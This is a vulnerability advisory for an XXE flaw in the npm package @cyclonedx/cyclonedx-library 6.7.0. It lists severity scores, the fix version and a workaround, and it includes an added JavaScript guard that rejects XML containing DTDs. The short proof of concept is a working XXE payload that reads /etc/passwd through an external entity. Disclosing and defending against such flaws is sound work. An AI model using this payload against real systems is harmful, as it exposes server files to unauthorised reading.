CVE-2024-34345 @cyclonedx/cyclonedx-library

Package

Manager: npm
Name: @cyclonedx/cyclonedx-library
Vulnerable Version: =6.7.0 || >=6.7.0 <6.7.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00058 (percentile 0.184)

Details

@cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability

### Impact

XML External Entity (XXE) injection may be possible when the provided XML validator is run on arbitrary input.

#### POC

```js
const { Spec: { Version }, Validation: { XmlValidator } } = require('@cyclonedx/cyclonedx-library');

const version = Version.v1dot5;
const validator = new XmlValidator(version);

const input = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
  <components>
    <component type="library">
      <name>testing</name>
      <version>1.337</version>
      <licenses>
        <license>
          <id>&xxe;</id><!-- << XML external entity (XXE) injection -->
        </license>
      </licenses>
    </component>
  </components>
</bom>`;

// Validating this forged (^) input might lead to unintended behaviour,
// because the XML external entity would be taken into account.
validator.validate(input).then(ve => {
  console.error('validation error', ve);
});
```

### Patches

This issue was fixed in `@cyclonedx/cyclonedx-library@6.7.1`.

### Workarounds

Do not run the provided XML validator on untrusted inputs.

### References

* The issue was introduced via <https://github.com/CycloneDX/cyclonedx-javascript-library/pull/1063>.
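As an added example (not code from the advisory or the CycloneDX project), one way to apply the workaround above for callers that cannot upgrade yet: refuse any document that declares a DTD before it reaches the validator. The `guardedValidate` wrapper and the sample documents are assumptions constructed for this illustration; it takes the validator as an argument so the guard itself needs no import.

```javascript
// Added example, not part of the advisory or the CycloneDX library.
// Strict by design: outside comments and CDATA, well-formed XML uses "<!"
// only for markup declarations (<!DOCTYPE, <!ENTITY, ...), so any such
// occurrence is grounds for rejection before a DTD-aware parser sees it.
function containsDtd(xml) {
  let i = 0;
  while (i < xml.length) {
    if (xml.startsWith('<!--', i)) {
      const end = xml.indexOf('-->', i + 4);
      if (end === -1) return true;            // unterminated comment: unsafe
      i = end + 3;
    } else if (xml.startsWith('<![CDATA[', i)) {
      const end = xml.indexOf(']]>', i + 9);
      if (end === -1) return true;            // unterminated CDATA: unsafe
      i = end + 3;
    } else if (xml.startsWith('<!', i)) {
      return true;                            // DOCTYPE/ENTITY/other DTD markup
    } else {
      i += 1;
    }
  }
  return false;
}

// Hypothetical wrapper around any object exposing validate(xml) -> Promise,
// such as the library's XmlValidator; the DTD check runs first.
function guardedValidate(validator, xml) {
  if (containsDtd(xml)) {
    return Promise.reject(new Error('rejected: input declares a DTD'));
  }
  return validator.validate(xml);
}

// Constructed samples: a plain BOM (a "<!DOCTYPE" inside a comment is
// harmless) and a BOM carrying an external-entity declaration.
const BENIGN = '<?xml version="1.0"?>\n' +
  '<bom xmlns="http://cyclonedx.org/schema/bom/1.5">' +
  '<!-- the text <!DOCTYPE inside a comment is harmless -->' +
  '<components><component type="library"><name>a</name></component></components></bom>';
const WITH_DTD = '<?xml version="1.0"?>\n' +
  '<!DOCTYPE bom [ <!ENTITY e SYSTEM "file:///dev/null"> ]>' +
  '<bom xmlns="http://cyclonedx.org/schema/bom/1.5"><components/></bom>';

// Stand-alone demo with a stub validator standing in for XmlValidator.
const stub = { validate: async () => 'validated' };
guardedValidate(stub, BENIGN).then(r => console.log('benign:', r));
guardedValidate(stub, WITH_DTD).catch(e => console.log('dtd:', e.message));
```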

Metadata

Created: 2024-05-08T19:55:37Z
Modified: 2024-05-14T20:01:46Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-38gf-rh2w-gmj7/GHSA-38gf-rh2w-gmj7.json
CWE IDs: ["CWE-611"]
Alternative ID: GHSA-38gf-rh2w-gmj7
Finding: F083
Auto approve: 1